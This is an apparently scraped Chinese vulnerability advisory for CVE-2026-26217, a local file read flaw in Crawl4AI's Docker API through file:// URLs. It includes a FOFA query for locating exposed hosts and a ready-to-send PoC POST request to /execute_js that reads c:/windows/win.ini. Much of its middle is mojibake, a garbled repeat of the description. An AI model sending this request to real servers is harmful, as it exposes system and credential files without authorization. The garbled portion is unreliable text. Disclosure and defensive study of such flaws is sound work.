execute_js 服务器端请求伪造漏洞(CVE-2026-26217)
漏洞描述
Crawl4AI 是一个开源的 AI 爬虫工具。Crawl4AI 0.8.0 版本之前在 Docker API 部署中存在本地文件包含漏洞。攻击者可以通过 /execute_js、/screenshot、/pdf 和 /html 端点传入 file:// 协议的 URL,从而读取服务器文件系统上的任意文件(如 /etc/passwd)。
FOFA 语句
系统自动生成(不一定准确):title="execute_js 服务器端请求伪造"
影响范围
Crawl4AI
漏洞详情
Crawl4AI /execute_js 鏈嶅姟鍣ㄧ璇锋眰浼�犳紡娲烇紙CVE-2026-26217锛�
鏃ユ湡: 2026-02-27
| 褰卞搷杞欢:
Crawl4AI
| POC:
宸插叕寮�
婕忔礊鎻忚堪
Crawl4AI 鏄竴涓紑婧愮殑 AI 鐖櫕宸ュ叿銆侰rawl4AI 0.8.0 鐗堟湰涔嬪墠鍦� Docker API 閮ㄧ讲涓瓨鍦ㄦ湰鍦版枃浠跺寘鍚紡娲炪�傛敾鍑昏�呭彲浠ラ�氳繃 /execute_js銆�/screenshot銆�/pdf 鍜� /html 绔偣浼犲叆 file:// 鍗忚鐨� URL锛屼粠鑰岃鍙栨湇鍔″櫒鏂囦欢绯荤粺涓婄殑浠绘剰鏂囦欢锛堝 /etc/passwd锛夈��
PoC浠g爜
澶嶅埗
POST /execute_js HTTP/1.1
Host:
Content-Type: application/json
Content-Length: 74
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
{"url":"file:///c:/windows/win.ini","scripts":["document.body.innerText"]}
鐩稿叧婕忔礊鎺ㄨ崘
Crawl4AI /crawl hooks 浠g爜鎵ц婕忔礊锛圕VE-2026-26216锛�
POC
CVE-2020-26217: XStream <1.4.14 - Remote Code Execution
修复建议
暂无